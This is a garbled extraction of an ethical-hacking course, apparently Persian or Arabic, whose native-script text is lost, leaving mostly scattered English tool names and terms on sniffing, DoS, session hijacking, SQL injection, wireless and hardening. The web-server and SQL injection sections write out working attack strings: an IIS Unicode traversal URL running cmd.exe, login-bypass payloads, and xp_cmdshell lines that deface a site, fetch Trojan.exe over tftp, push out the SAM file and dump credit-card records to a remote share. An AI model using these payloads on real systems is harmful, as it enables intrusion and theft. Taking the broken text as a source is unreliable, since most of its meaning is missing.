
MAC Duplicating
MAC duplicating sniff MAC address
.
MAC address .
. MAC filtering
.

Capture Ethereal
Ethereal .
:

:ip.dst eq www.eccouncil.org www.eccouncil.org


.

:ip.src == 192.168.1.1 192.168.1.1 .

:eth.dst eq ff:ff:ff:ff:ff:ff broadcast 2 .

114

MAC Flooding
sniffer .
.
.
sniffer ARP spoofing : .flooding
ARP spoofing MAC address gateway
gateway sniffer .
flood .
sniffer
.

115

DNS Poisoning
(DNS poisoning) DNS poisoning DNS
. DNS
. URL
DNS IP . DNS
.

.
IP DNS IP
.
.
worm .

DNS poisoning :

:Intranet spoofing .

:Internet spoofing .

:Proxy server DNS poisoning DNS


.

:DNS cache poisoning DNS


.
116

:Intranet DNS Spoofing


LAN sniff . ARP
.

:Internet DNS Spoofing


DNS .
Internet DNS Spoofing .
.1 .
Treewalk .2 readme.txt IP Treewalk
DNS .
.3 dns-spoofing.bat IP .
.4 dns-spoofing.bat Jessica ) (chess.exe
.5 properties DNS
.
.6 Jessica DNS DNS .
.7 Jessica XSECURITY.com
sniff .

117

:Proxy Server DNS Poisoning


Rebecca proxy server Internet Explorer
. .

:DNS Cache Poisoning


DNS .
. DNS
. DNS
118

DNS IP .
.

EtherFlood flood .
.
Dsniff .
urlsnarf msgsnarf mailsnarf filesnarf webspy .
.
Sshmitm webmitm man-in-the-middle SSH HTTPS .
dnsspoof Arpspoof macof
sniffer .
Cain & Abel
brute force VoIP
.
Packet Crafter TCP/IP/UDP .
flag .
SMAC MAC address MAC address
.
MAC Changer MAC address . MAC
MAC MAC MAC MAC
address .
WinDNSSpoof DNS ID spoofing .
sniff . ARP
spoofing flooding .
Distributed DNS Flooder DoS DNS .
119

DNS .
:
SmartSniff MSN Sniffer Win Sniffer Ace Password Sniffer Effetech ArpSpyX Ettercap
AW Cloasoft EtherLook NetIntercept Etherpeek Snort EtherApe Ntop NetSetMan SMAC
URL Snooper BillSniff Sniphere NetResident Sniffem CommView Ports Traffic Analyzer
EtherScan Analyzer Ipgrab AnalogX Packetmon EtherDetect Packet Sniffer.

.

. AES
RC4 RC5 VPN
. packet sniffer
. sniff SSH.
sniffer :

Ping method
ARP method
Latency method

IDS

120


netINTERCEPTOR .
.
sniffer .
Sniffdet sniffer TCP/IP Sniffdet .
promiscuous mode sniffer
.
Antisniff Promiscan ARP Watch Prodetect
sniffer .

121

Session Hijacking Denial of Service


DoS
.
.
) session hijacking ( . DoS
. session
hijacking .
session hijacking man-in-the-middle .

session hijacking DDoS DoS TCP


sequence number .
DoS session hijacking .

123

Denial of Service
DoS . DoS .
DoS (BOTs) robot robot
) (BOTNETs smurf SYN flooding DoS DDoS .

DoS
DoS : DoS ) DoS(
).(DDoS

. DoS :

:
.
DoS
. DoS
) .(DDoS

Jolt2 DoS IP .
.
Bubonic DoS TCP
.
124

Ping of Death IP
Ping of Death .
.
SSPing ICMP
.
A LAND Attack IP IP .
loop
.
CPU Hog DoS CPU
.
WinNuke 139 IP
. (OOB) Out of Bounds
) (buffer overflow .
Targa DoS .
.
RPC Locator .
DoS DoS .

DDoS BOT BOTNET


.
DoS DDoS .
DDoS
DDoS DoS . DoS DDoS
. DDoS
.
125


Trinoo UDP DDoS Trinoo master .
DoS Master . agent
) daemons ( ) (
IP . Trinoo agent . daemon
buffer overflow WinTrinoo . Trinoo
Trinoo.
Shaft Trinoo UDP master agent .
flood
Shaft . ICMP UDP TCP flooding.
Stacheldraht TFN UDP flood ICMP flood TCP SYN
. telnet ) ( agent
) ( . .

126

) Tribal Flood Network (TFN ) bandwidth-depletion


( ) resource-depletion ( . UDP
TCP SYN ICMP flooding flooding smurf TFN2K . TFN
TFN2K .
IP spoofing ) (transport UDP
TCP ICMP .
Mstream TCP ACK flag handler
agent handler .


zombie BOT .
.
IP .

DDoS :

Master/ Handler
Slave/ secondary victim/ zombie/ agent/ BOT/ BOTNET
Victim/ primary victim
master slave . master Victim .

master . slave .

127

DDoS . intrusion
DDoS slave . attack
slave .

:DDoS

128

BOT BOTNET
BOT ) (web robot .
)spammer( BOT
. BOT .
BOTagent . web crawler )spider(
.
BOT
. BOT IRC
. BOT
... .
BOTNET BOTBOTNET . DDoS
SMTP
. BOTNET
DDoS BOT .

129

smurf
smurf ICMP IP
broadcast . ICMP
. broadcast
. DoS ping flood.
IRC smurf .

SYN flooding
SYN flood TCP
. SYN
130

IP . IP ) (spoofed
TCP .
" "
. SYN flood SYN cookies :
Micro Blocks RST cookies Stack Tweaking.

DoS DDoS
DoS .
:
:network-ingress
network-ingress .
.
:rate-limiting
. traffic shaping .
: slave master agent
.
.
. IDS TFN Trinoo Stacheldraht
signature .
:Host-auditing
DDoS .
:Network-auditing agent DDoS
.
:
.

131


Find_ddos DoS
.
SARA .

.
RID TFN Trinoo Stacheldraht .
Zombie Zapper zombie ) (sleep
. .

Session Hijacking
Session hijacking
Session hijacking . ID
Session hijacking . sequence number
.
132

Spoofing Hijacking
spoofing hijacking . spoofing
spoof
) (.

hijacking .

) (.

133

Session hijacking :
: sequence number .
: RST FIN
.
: TCP sequence number
.

session hijacking
Session hijacking : .
.
sequence number TCP .

.
.
.

134

:TCP
TCP . TCP ACK
sequence number . TCP session hijacking .
TCP :
.1 . SYN sequence number
) (ISN .
.2 SYN ISN ACK
sequence number .
.3 ACK sequence number.
timeout flag FIN RST .
RST
. FIN
. FIN
RST .

sequence
TCP .
(SN) sequence number .
.
sequence number .
TCP SYN . synchronizing
sequence number ) (ISN ISN .
4 .
ACK sequence number
. sequence number
. 1 .
) 45
ACK sequence number 45 (.
135

sequence number TCP


:

session hijacking sequence number .


TCP sequence prediction sniff .
sequence number .
.

136

sniff sequence number .


session hijacking
sequence number .
IP ) (spoofed
. sequence number .
. flood ) (
RST .

session hijacking
session hijacking :
: sequence number .
: TCP RST FIN
. DoS .
: TCP sequence number
.
:session hijacking

Network Level Hijacking


Application Level Hijacking

TCP/IP Hijacking
TCP/IP hijacking
.
. .
.

RST Hijacking
RST hijacking (reset) RST . ACK number
. reset
.

Blind Hijacking
TCP
) (source routing .
.


Juggernaut sniffer (hijack TCP session) TCP .

"" .
hijacking .
Hunt Hunt .
ARP spoofing MAC address
TCP .
TTYWatcher session hijacking


. Sun Solaris.
IP Watcher ) (Session hijacking
.
.
T-Sight .

T-Sight . .
Remote TCP Session Reset Utility TCP IP
. TCP .

session hijacking
TCP session hijacking .
TCP/IP .
Session hijacking
ISN sequence number .
sniff .
session hijacking :

session hijacking .

session hijacking
session hijacking .
.IPSec
.
.
SSH SSL.
session hijacking
) (remote
.
VPN .
.

.
Session hijacking :


.
.
.
.
.

24 7
.
.



. patch
.


.
:

) Apache IIS (...


DMZ
.


) defacement ( .
deface Deface .

. .
deface :

administrator man-in-the-middle

administrator brute-force

DNS

FTP e-mail

)(permission

) SQL injection SQL (

Telnet SSH

URL poisoning

extension

IIS Unicode Exploit


2000 IIS directory traversal
Unicode exploit . IIS

directory

traversal/Unicode exploit 2000 patch


CGI ISAPI ASP .
)( IIS parser .
) (universal .
. IIS
. %c0%af
IIS . ASCII "%2E" "%c0%af"
. HTTP IIS :
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0
.
Unicode Directory Traversal IIS 4 5 URL


backdoor .

IIS Unicode exploit


.


N-Stalker Web Application Security Scanner
buffer overflow SQL injection cross-site scripting parameter-
tampering .
Metasploit framework .
.
.
.
IISxploit.exe directory traversal exploit IIS
Unicode string .
) ASP Trojan (cmd.asp
. backdoor
.
CleanIISLog log IIS IP .
W3SVC IP
ServerMask SAINT Vulnerability Scanner CORE IMPACT :
.Neosploit MPack LinkDeny HTTPZip CacheRight ServerMask ip100

patch
hotfix .
. hotfix service
pack . patch patch .
patch patch . patch
. patch patch
Microsoft St. Bernard PatchLink
patch . UpdateExpert :
.HFNetChk Qfecheck


:
: www.securityseers.com
: Nessus Security Scanner Snort .Nmap
: XVScan SANE .Parallel Port

Whisker
.

:
N-Stealth HTTP Vulnerability Scanner
WebInspect
Shadow Security Scanner
SecureIIS
ServersCheck Monitoring
GFI Network Server Monitor
Servers Alive
Webserver Stress Tool
Secunia PSI


.
:

administrator

Default web site default FTP site

WebDAV

) directory browsing (

patch

buffer overflow ...

("File not found") 404

logging auditing

80 443

GET POST

cross site scripting "<" ">" , " "&lt


" "&gt


Patch update:
MBSA

Auditing :logging

failed logon attempts log

log IIS

:Script Mapping

Extension 404.dll (.shtml .ida .htw .idq .printer .htr .idc .stm)

WebDAV

NetBIOS SMB (137 138 139 445)

guest

administrator

Administrator
:ISAPI Filters

ISAPI

NTFS

NTFS

IUSER COMPUTERNAME deny

:IIS Metabase

NTFS metabase

Share:

share (C$ Admin$) administrator

80 443



.
.
. google hacking .



.
.

/
. .

.


.

.
.
.


.
:
. :

. :
:Cross-site scripting
cross-site scripting .
.
.
:XSS XSECURITY )( .

www.xsecurity.com/default.asp?name=<script>evilScript()</script> .
.
XSECURITY <script>evilScript()</script>
. HTML .
.
. XSECURITY
.

) (validate

XSS .

:SQL injection SQL . SQL


URL .
.
SQL Injection .
.
:Command injection .
. python Perl ...
.
(language-specific libraries) .
:Directory traversal/Unicode windows explorer
. .
patch hotfix .

:Cookie poisoning and snooping poisoning .


.
.

) (timeout

IP

logout

:Buffer overflow
. .
) Java (J2EE .

StackGuard ) StackShield
( .
:Authentication hijacking .
SSL .
Cookie Cryptographic interception Parameter/form tampering :
Platform Obfuscation application Error message interception attack Log tampering snooping
Zero day Web services attacks Security management exploits DMZ protocol attacks exploits
Network access attacks attack .TCP fragmentation


Instant Source HTML
. toolbar IE
.
Wget
.
.
WSDigger SQL injection
cross-site scripting .
dotDefender :
Patch Traversal Header Tampering Cross-site Scripting Proxy Takeover SQL Injection
.Probes

Burp .
man-in-the-middle .
WebSleuth spidering .
.

WebWatchBot IP Ping
Port FTP POP3 SMTP HTTPS HTTP DNS .
.
BlackWidow
.
Parosproxy WebScarab Watchfire AppScan Ratproxy Mapper :
AppScan AccessDriver Falcove NetBrute Emsa Web Monitor KeepNI

Acunetix Web

.Scanner

Google Hacking
Google hacking
. http://johnny.ihackstuff.com Acunetix Web Vulnerability Scanner
google hacking .
password medical records .
.


.
. .


.
HTTP . HTTP basic : .digest basic
digest
challenge-response hash .

token-based certificate-based NTLM


. NTLM Internet explorer IIS
NTLM
. 2000 2003 Kerberos
. ) (certificate-based X.509 /
. SecureID 60
.


.
PIN

.

:
.

:
.

.

:
.
.

shoulder surfing

microsoft1

msoftmsoft

tfosorcim

io

qwerty asdf

e z3ro10v3 L 3 i 1 o 0

) (.pwl

Kerberos

" : "james8

" :"samatha

" :"superstitious

" :"sUperStiTIous

" :"obiwan

" :"spicer

" :"qwertyuiop


.
dictionary brute-force .
.
backdoor .
sniff .


dictionary attack
.
. hash
. hash ) (
SAM .
brute force .

.

:
:
:Dictionary .
:Brute force .
:Hybrid .

Cain & Abel
dictionary brute force .
ARP .
) Lophtcrack (LC4
.
John the Ripper .

Gammaprog POP3 .
MessenPass Yahoo Messenger MSN Messenger
Google Talk .
Password Spectator .
.
Webcracker . " HTTP
"302 object moved .
.

Munga WebCracker RAR Hydra Authforce Obiwan Brutus :


WWWhack RockXP Wireless WEP Key Password Spy SnadBoy PassList Bunga
Advanced Mailbox Password Recovery Atomic Mailbox Password Cracker Passwordstate
Messenger Key Mail PassView Network Password Recovery .SniffPass
Password Administrator WebPassword :
PassReminder Easy Web Password Password Safe .My Password Manager

Buffer Overflow SQL Injection


SQL injection Buffer overflow
) (input box .
URL
.
SQL injection Buffer overflow :
) .(invalid
.
shell .

SQL Injection
SQL injection
shell . SQL server
. Cmd .
.
SQL server .
SQL server .

SQL Injection SQL


. SQL .
SQL
. SQL injection
SQL .

SQL injection
SQL injection
. SQL server :
.1
)
" .("I forget my password POST
GET . POST URL
. . GET
POST <Form> :
<Form action=search.asp method=post>
<input type=hidden name=X value=Z>
</Form>
CHI JSP ASP PHP URL
:
http://www.xsecurity.com/index.asp?id=10
:
http://www.xsecurity.com/index.asp?id=blah' or 1=1
SQL server .2 )' '( .


. ' 'a'='a )
( SQL injection . )'(
SQL Injection .

.3 SELECT INSERT
.

SQL Server
SQL
:
)'( :
Blah' or 1=1
Login: blah' or 1=1
Password:: blah' or 1=1
http://search/index.asp?id=blah or 1=1
SQL Injection :
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a

.
SQL server .
SQL .
SQL :
:
Blah;exec master..xp_cmdshell dir c:\*.* /s >c:\directory.txt--

:
Blah;exec master..xp_cmdshell echo hacker-was-here > c:\hacker.txt-: IP ping
Blah;exec master..xp_cmdshell ping 192.168.1.1-:( write )
Blah;exec master..xp_cmdshell echo you-are-defaced >
c:\inetpub\WWW.root\index.htm"-:( )
Blah;exec master..xp_cmdshell cmd.exe /c appname.exe"-:
Blah;exec master..xp_cmdshell tftp -i 10.0.0.4 GET Trojan.exe
C:\trojan.exe"-:
Blah;exec master..xp_cmdshell tftp i 10.0.0.4 put
C:\winnt\repair\SAM SAM" - . sp_makewebtask HTML
: creditcard
Blah';EXEC master..sp_makewebtask "\\10.10.1.4\share\creditcard.html",
"SELECT * FROM CREDITCARD"
: SQL injection
SQLPoke Database Scanner AppDetective SQL2.exe SQLSmack SQLbf SqlExec SQLDict
.SQLPing v2.2 NGSSQuirreL NGSSQLCrack

Blind SQL Injection



: SQL .
.

SQL injection
) (syntax SQL . SQL
. JDBC
ADO .

SQL Injection
SQL injection
sa administrator .
)
SQL server ( . admin .
.
:

)(single quota

SQL injection :

Acunetix Web Vulnerability Scanner


SQL .

gets() bcopy() sprintf() strcpy() strcat() scanf()



Buffer Overflow
Buffer overflow .
SQL injection .
shell .
buffer overflow .

overflow .
. 32
. NT .

):(Stack
LIFO (last in first out) .
. ) (release.

:Heap
Heap
. malloc .

buffer overflow stack-based : Stack .heap-based heap


. stack heap
. )stack( heap
Buffer overflow .
heap overwrite .
shell Cmd .
buffer overflow
.

)(stack-based buffer overflow


Buffer overflow ) (stack-based
. . overwrite
. C
) ( .

:
.1 ) (stack .
.2
.
overwrite .
.3
. overwrite
.

buffer overflow
.
: ) (overwritten EIP .

(heap-based overflow) heap


) )( (malloc heap .
heap overwrite
.


heap overwrite.

) (Shellcode stack-based overflow .


.
.

buffer overflow
: .
.
) (string . .


. segmentation . overwrite
.
.

buffer overflow
buffer overflow
. .
(No Operation) NOP padding
NOP . .
IDS NOP
. IDS NOP
.x++ , x--;?NOPNOP buffer overflow
IDS .
C C++ strcat() strcpy() streadd()
buffer overflow .
buffer overflow .
buffer overflow
RAD patch
.
buffer overflow .

Libsafe Insure++ Valgrind Immunix System StackGuard


buffer overflow .


. broadcast

.
) (WLAN IEEE 802.11
802.11b 802.11a 802.11n . 802.11
. 802.11i 802.11 . Wi-Fi
WPA WPA2
802.11 802.11i .
IEEE Wi-Fi .


:802.11 DSSS FHSS Infrared .
:802.11a
:802.11b WiFi
:802.11g 802.11b
:802.11i
:802.16
:Bluetooth
:900MHz

:
. omni : .directional
:Access Point .
.
:SSID
SSID . .
access point . SSID
.

WEP WPA
access point :
) (open system ) .(shared key
. WEP
.
WEP WEP .
.
WEP 64 128 . WEP
40 104 24 (Initialization Vector) IV
WEP 64 128 .
RC4 IV WEP : WEP
. FMS .
WEPCrack AirSnort aircrack WEP
. brute force WEP
FMS.
WPA IEEE 802.11i .


TKIP WPA Personal WPA Enterprise
RC4 WPA Personal . ASCII
WPA Enterprise RADIUS Server WPA Enterprise .
RADIUS Server TKIP . rotate
WEP .
WPA2 802.11i AES AES .
WPA2 . TKIP
mixed mode security Mixed mode .
TKIP AES . AES
PDA TKIP WPA Personal .
WPA2 Personal WPA Enterprise .
WPA2 Enterprise RADIUS Server 802.1X EAP
. 802.11i WPA2 WPA2 .

IEEE 802.11

WEP

WEP

IV WEP

WPA

TKIP

RADIUS

WPA2

AES

IEEE 802.11i

AES

)(802.1x/EAP
RADIUS
)(802.1x/EAP
RADIUS
)(802.1x/EAP


:WarWalking
:Wardriving

:WarFlying
:WarChalking chalk

:Blue Jacking

:GPS


Aircrack WEP .
Aircrack .
.
WEPCrack AirSnort .
NetStumbler Kismet . SSID MAC address
. Kismet SSID
IDS .
WEPdecrypt WEP dictionary attack key generator.
CowPatty WPA-PSK brute force.

SSID MAC spoofing


.
hotspot access point
.
POP3 FTP SMTP .
SSID beacon .
SSID . SSID beacon
. access point SSID .
SSID .
MAC filtering .
MAC address access point . MAC
filter scaleable access point .
MAC spoofing MAC filtering . MAC
MAC address .
MAC Address XP
:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}
. XP
. Edit New String Values .
NetworkAddress . Modify MAC .
Address OK . MAC Address
.

SMAC MAC spoofing .

) Rogue Access Point(


Access pointaccess point
. access point . access point
access point . access
point access point
.
access point .
access point NetStumbler : .MiniStumbler


ClassicStumbler access point .
AirFart .
Hotspotter .
ASLEAP AP Radar : .Cain & Abel


:
: WEP
WPA LEAP .
.
: hotspot.
DoS :DoS Access Point
access point access point .
DoS LLC ) deauthentication (death
.
AP masquerading access point :spoofing SSID
access point .
:MAC spoofing MAC address
MAC filtering .
access point .
.

NetStumbler .
kismet NetStumbler
. Access
point SSID ... . monitor mode
Airodump capture Airodump . SSID
capture . Aircrack
. WEP
WireShark
POP FTP Telnet.


:
AP Scanner StumbVerter WaveStumbler Mognet MacStumbler PrismStumbler Kismet
Wifi Finder AirTraf Wireless Security Auditor .eEye Retina WIFI
:
EtherPEG vxSniffer Aerosol VPNmonitoral WireShark NAI Wireless Sniffer AiroPeek
.ssidsniff WinDump DriftNet



. OSI .

2 :

WPA
WPA2
802.11i

3 :

IPSec SSL VPN

7 :

HTTPS SSH .FTPS

:MAC Filtering MAC Address


.

SSID :SSID .

: .

access point broadcasting .

Access point .

DHCP IP .

access point .

access point .

Firmware .

.SSL

access point IP .

VPN .


IT
.
IDS .
" " .
tape keylogger
access point .

) (.



.
.
.

.

.
.
.
:

keylogger backdoor rootkit

access point

) (


:
:
. CCTV
. . tape
.

) (lock .
. ...
: IDS spyware
.
:
.


) (
.
.

. :

.
.


.
:


o
o
o
.

business continuity plan (BCP) disaster recovery plan (DRP) .

: .
.

:
:
o ...
o
o
o
: .
:
o
o
o ) (boot floppy CD-ROM

o DOS DOS
.

: .
. :
o
o
o
o
Access point : access point


. :
o WEP
o SSID
o access point
o

:
:
o ) (auto answer
o

: .
:
o
o
o
o

: .

wiretap : .
.
(shielded) .

:
.
.
.
.


:
. (www.sentryinc.com) CyberAngel (www.ztrace.com) Ztrace Gold :
.(www.computrace.com) ComputracePlus .
: :
GPS . ...
.

:DeviceLock
.



. distribution .
.
Mandrake RedHat Debian SUSE Gentoo Knoppix.

.
.
.



. .
jove pico ex vi .GNU emacs
vi .
emacs .
GNU
. GNU BSD
. GNU BSD .

. )(job control
.
MS-DOS.
. . C
) (csh C . (sh) classic Bourne .

.
GNU Bash Bash ) job
(control .
tcsh C . small Bourne zsh
BSD's ash ksh-like shell .rc

:touch file.txt file.txt


] :cat [file
10 :head file.txt . 25 head -25 file.txt

10 :tail file.txt . 25 tail -25 file.txt

:cp file newfile
:mv file newfile
] :mkdir [directoryname
:rm file
:ls dir
:pwd
:arp IP
:ifconfig
:netstat
:nslookup IP
:ping
:w session
:ps
:route
:shred overwrite
:traceroute
:adduser user1
:passwd user1 user1

:
:bin )(

:sbin ) (

:etc

:include include

:lib

:src

:doc

:man ) manual(

:share


.
.
.
.
CD .
.
.

backdoor . .
ftp.kernel.org

:
.1 /usr/src
. tar zxf .
.2 . /usr/src/Linux make
menuconfig .
. menu .
make dep; make clean .
.
. clean
.
.3 make zImage make modules
.
.4 . /boot
:
cp /usr/src/Linux/arch/i386/boot/zImage /boot/newkernel
.5 make modules_install . /lib/modules
.
.6 /etc/lilo.conf :
image = /boot/newkernel
label = new
read-only
.7 lilo .
lilo.conf .
Linux live CD . CD
.
CD live www.distrowatch.com
CD . CD .

GCC
GCC ) (command-line .
http://gcc.gnu.org . C++ C
.
C++ GCC :
g++ filename.cpp -o outputfilename.out
C GCC :
gcc filename.c -o outputfilename.out


) (LKM
. LKM rootkit LKM
. LKM .
LKM rootkit Adore Knark : .Rtkit
rootkit . LKM /tmp
/var/tmp
. LKM rootkit
. LKM modprobe LKM.


.
:

cfengine cdrecord bugzilla bind balsa Apache

fileutils fetchmail (many) exim evolution ethereal (many) cvs cups Cron
kernel kerberos KDE iproute inetd hylafax gzip gnupg glibc ghostscript Gdm

openssh MYSQL mutt mplayer mpg123 mozilla man mailman lynx lsh Lprng
openssl
sendmail screen samba rsync python proftpd PostgreSQL postfix PHP pine Perl

xpdf xinetd XFree86 xchat wu-ftpd wget webmin vim tcpdump sudo stunnel snort
zlib
IP
. 65535 TCP
UDP ) 131070(
.

Nmap .
.
:Nessus
.
Nessus .

Xcrack
.


.
.


) (hardening .
.
.
.

.
null /etc/shadow .
deny all
. deny all .
deny all .
:
echo "ALL: ALL" >> /etc/hosts.deny

/proc filesystem /etc/sysctl.conf .

patch .
.

IP tables

)(HIDS

)(IPTable
IPTable ipchains .
stateful . :
iptables -A INPUT -s 0/0 -i eth0 -d 192.168.1.1 -p TCP -j ACCEPT
eth0 IP
IP 192.168.1.1 .
iptables -A OUTPUT -p icmp --icmp-type echo-request -j ACCEPT
(ping) ICMP echo-request
ICMP .

(Security Auditors Research Assistant) SARA
. MAC OS.
Tcpdump .
ping .
Snort .
syslog .
Netcat
TCP UDP .
.

SAINT SATAN .
) (check ) ( .
:Wireshark
.
:
Hunt LIDS IPTraf LSOF Nemesis Sniffit Hping2 Abacus Port Sentry . ...

IDS honeypot


) (IDS honeypot
. ) (IDS
.
honeypot
.
.


signature
. IDS packet sniffer
. event IDS pager
.
) (IPS ... .
IPS .
) (IDS :
:Host-based ) (HIDS

. agent Norton Internet Security Cisco Security .
: worm HIDS .
:Network-based ) (NIDS
.
.

malware . . IDS
.

IDS

Snort HIDS
. Snort IDS snort.conf .
snort :
snort -l c:\snort\log -c C:\snort\etc\snort.conf -A console
BlackICE
. ) ( .
IDS .RealSecure Lucent RealSecure eTrust Internet Defense Dragon Sensor :
) (IDS signature analysis anomaly detection


. signature signature
Signature .
. IDS
phf CGI . anomaly detection

.

IDS signature
. UDP TCP HTTP ICMP
. IDS
. session splicing .

.

IDS :

IP

) (
event.log . SNMP Tivoli

) IP IP (

TCP TCP FIN TCP RST


IDS
(pattern matching)
.

IDS .


ADMutate .
signature IDS .
Fragrouter Stick Mendax SideStep : .Anzen NIDSbench


.
) (perimeter ) ( .
.

rule

:Packet filters network OSI .


rule . IP
.
performance . packet filtering .

:Circuit level gateways session OSI . TCP handshaking


. circuit-level
gateway gateway .
. .

:Application level gateways gateway


application OSI . application-level gateway
web proxy telnet gopher FTP ...
application http:post get .

:Stateful multilayer inspection firewalls


. network OSI
application .
.
) ( Firewalking Port Scanning

Banner Grabbing Firewalking .


. Banner Grabbing
.
.
Telnet FTP Web .

telnet

mail.targetcompany.org 25 SMTP banner grabbing.



. 80
.
.
.
80
. reverse WWW shell .

80

HTTP
.
covert ICMP
. covert TCP
) (acknowledgment.

007 Shell shell-tunneling covert
.
ICMP Shell Telnet ICMP
) ( .
AckCmd / TCP ACK
.
Covert_TCP
IP .


Traffic IQ Professional
.
:
Application layer firewalls
Intrusion Detection Systems
Intrusion Prevention Systems
Routers and Switches

TCPOpera IDS .
Firewall Informer
. BLADE
) SAFE (
.
Atelier Web Firewall Tester
. 6 HTTP
.

Honeypot
honeypot DMZ
Honeypot .
IP .
. honeypot
DMZ . honeypot
.

honeypot

Honeypot (Low-interaction) : Honeyd Specter .KFSensor

Honeypot )(Medium-interaction

Honeypot ) :(High-interaction Honeynets

:honeypot

False positive

false negative

IPv6

honeypot (high-interaction)

honeypot
Honeypot DMZ .
. honeypot

honeypot anti-honeypot
honeypot .
honeypot .
anti-honeypot honeypot honeyd ...
.

Honeypot open source :


Honeypot :

KFSensor
NetBait
ManTrap
Spector

Honeypot :open source

Bubblegum
Jackpot
BackOfficer Friendly
Bait-n-Switch
Bigeye
HoneyWeb
Deception Toolkit
LaBrea Tarpit
Honeyd
Honeynets
Sendmail SPAM Trap
Tiny Honeypot

Specter honeypot
.
Honeyd honeypot
.
KFSensor HIDS honeypot
.
Sebek honeypot .

Honeypot
Honeypot IP high-
interaction .
Honeypot . honeypot
. honeypot
IP honeypot .

Send-Safe Honeypot Hunter honeypot honeypot .
Nessus Vulnerability Scanner honeypot .


.
) (clear text ) (cipher text .
.
. .
.


.

. .
) substitution
( ) transposition ( .
substitution transposition . .


.
.

.
.


:
.

.
.

.
.

RC5 RC4 SHA MD5 Blowfish


40 448 .
. 40 brute-force 1,4 0,2
. 64 50 37
. 256
.

RC5 RC4 SHA MD5 Blowfish


.
:MD5 hashing 128
. .
MD5 .
:SHA 160 SHA . MD5
SHA . .
RC4 RC4 :RC5 streaming cipher
RC4 . RC5 .
RC5 . RC5 .
256 .
Blowfish :Blowfish cipher 64
. stream cipher 32 448 .

SSH
SSH .
telnet SSH2 . SSH SFTP.
40 . 56
. 64
. 128 .
256 .

Advanced File Encryptor


. 256 AES
.
Command Line Scriptor
. .
PGP ... .
.

Encrypt Encrypt Easy Encrypt PDF Encryption Engine :


ABC Omziff Alive File Encryption Advanced HTML Encrypt and Password Protect My Folder
.Command Line Scriptor CrypTool SafeCryptor CryptoForge EncryptOnClick CHAOS


PGP Crack brute force PGP.
Magic Lantern .
keylogger
.


.
:
.
) (Pen tester
.


Pen tester .
.
.
IP
.
.

.
. .

.

: .

.
.
.
.
outsource .
.
. 10 DMZ .
SLA .

.
.
.

.

)(pre-attack

)(attack

)(post-attack
. .
DNS Whois
) ( .
IP Whois
.
...

. :


. ) (exploitive )(responsive

. .
:

) :(perimeter ) (ACL
FTP SSH Telnet . buffer
DoS SQL injection overflow ... .



.
: :

:Input Validation LDAP SQL injection script injection OS command injection


injection .cross site scripting

:Output Sanitization .

:Access Control
...

:Checking for Buffer Overflow heap overflow stack overflow format


string overflow.

:Denial of Service DoS


.

:Component Checking
.

:Confidentiality Check
.

:Session Management
SSL SSL history cache .

: .
CORE IMPACT
. brute-force
.
:
.
administrator .

: .
. ) (leaving a mark
.
.
.


.
.

.


.
:

) (NDA


2006
:
:Nessus 11000 .
/ GTK
.
:GFI LANguard .
IP .
patch
... .
:Retina . Nessus
.
:CORE IMPACT
) ( .
.
:ISS Internet Scanner .
1300
... .
:X-Scan .
username .
:SARA SATAN .
.

:QualysGuard .
. 5000 .
:SAINT .
:MBSA MBSA.
3 .
:
:Metasploit Framework .
:Canvas 150 .


. :
